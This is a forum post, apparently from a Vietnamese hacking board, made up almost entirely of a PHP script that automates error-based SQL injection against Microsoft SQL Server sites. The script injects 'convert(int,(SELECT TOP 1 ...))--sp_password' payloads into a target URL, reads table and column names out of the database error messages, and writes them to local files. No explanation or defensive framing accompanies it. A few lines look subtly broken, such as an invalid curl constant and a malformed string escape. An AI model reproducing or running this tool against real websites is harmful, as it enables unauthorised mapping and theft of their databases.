h7t_2002- --[DEVELOPER]--
- Tổng số bài gửi : 67
Join date : 01/06/2009
Age : 33
Đến từ : /dev/null
by h7t_2002 Mon Nov 15, 2010 6:56 am
- Code:
<?php
ob_implicit_flush(1);
set_time_limit(0);
function geturl($url = "", $post = "") {
$cUrl = curl_init();
curl_setopt($cUrl, CURLOPT_URL, $url);
if ($post) {
curl_setopt($cUrl, CURLOPT_POST, 1);
curl_setopt($cUrl, CURLOPT_POSTFIELDS, $post);
}
curl_setopt($cUrl, CURLOPT_TIMEOUT, 'timeout_in_seconds');
curl_setopt($cUrl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($cUrl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cUrl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($cUrl, FOLLOW_LOCATION , 1);
if(strstr($url,"https")) {
curl_setopt($cUrl, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($cUrl, CURLOPT_SSL_VERIFYPEER, FALSE);
}
curl_setopt($cUrl, CURLOPT_COOKIEFILE, dirname(__FILE__)."/hacking.txt");
curl_setopt($cUrl, CURLOPT_COOKIEJAR, dirname(__FILE__)."/hacking.txt");
$pageContent = trim(curl_exec($cUrl));
curl_close($cUrl);
return $pageContent;
}
function cut_str($str = "", $left = "", $right = "") {
if ($str == "" || $left == "" || $right == "") {
return "";
}
$str = substr(stristr($str, $left), strlen($left));
$leftLen = strlen(stristr($str, $right));
$leftLen = $leftLen ? - ($leftLen) : strlen($str);
$str = substr($str, 0, $leftLen);
return $str;
}
function write_file($filename,$newdata="") {
$f=fopen($filename,"w");
fwrite($f,$newdata);
fclose($f);
}
function append_file($filename,$newdata) {
$f=fopen($filename,"a");
fwrite($f,$newdata);
fclose($f);
}
function read_file($filename) {
$f=fopen($filename,"r");
$data=fread($f,filesize($filename));
fclose($f);
return $data;
}
$url = "domainurl'%20and%201=";
$url1 = parse_url($url);
$url2 = explode(".",$url1['host']);
function get_table($query = "") {
global $url;
$query = str_replace(" ", "%20", trim($query));
$query = str_replace("+", "%2b", trim($query));
$query = str_replace("\", " ", trim($query));
$post = "convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES";
if($query != "") {
$post .= "%20WHERE%20TABLE_NAME%20Not%20in(" . $query . ")";
}
$post .= "))--sp_password";
$raw_content = geturl($url.$post);
$table = trim(cut_str($raw_content, "value '", "' to"));
$url1 = parse_url($url);
$url2 = explode(".",$url1['host']);
append_file($url2[1]."_tables.txt",$table."\n");
print $table . "\n";
if ($table != "" && $query != "") {
get_table($query . ",'" . $table . "'");
} else if($table !="") {
get_table("'" . $table . "'");
}
}
function get_column($query = "", $table = "",$file_name) {
global $url;
$data = array();
$post = "convert(int,(SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME='" . $table . "'%20AND%20COLUMN_NAME%20NOT%20IN(" . $query . ")))--sp_password";
$raw_content = geturl($url.$post);
//echo $raw_content;
$column = "" . trim(cut_str($raw_content, "value '", "' to")) . "";
$data['column'] = $column;
$data['query'] = $query;
$data['table'] = $table;
if ($data['column'] != "") {
append_file($file_name,$data['column']."\n");
print "++ Inserted Column ".$data['column']." of Table: ".$table."\n";
if($data['query'] == "") {
get_column("'".$data['column']."'", $table,$file_name);
} else if($data['query'] !="") {
get_column($data['query'] . ",'" . $data['column']."'", $table,$file_name);
}
}
}
function columns() {
global $tables,$url2;
$systables = array("sysconstraints","syssegments","dtproperties");
foreach($tables as $table) {
if(!in_array(trim($table),$systables) && $table != "") {
$table = str_replace("\n","",$table);
$table = str_replace("\r","",$table);
$file_name = $url2[1]."_".$table.".txt";
get_column("''",trim($table),$file_name);
}
}
}
get_table("");
$tables = file($url2[1]."_tables.txt");
columns();
exit();
?>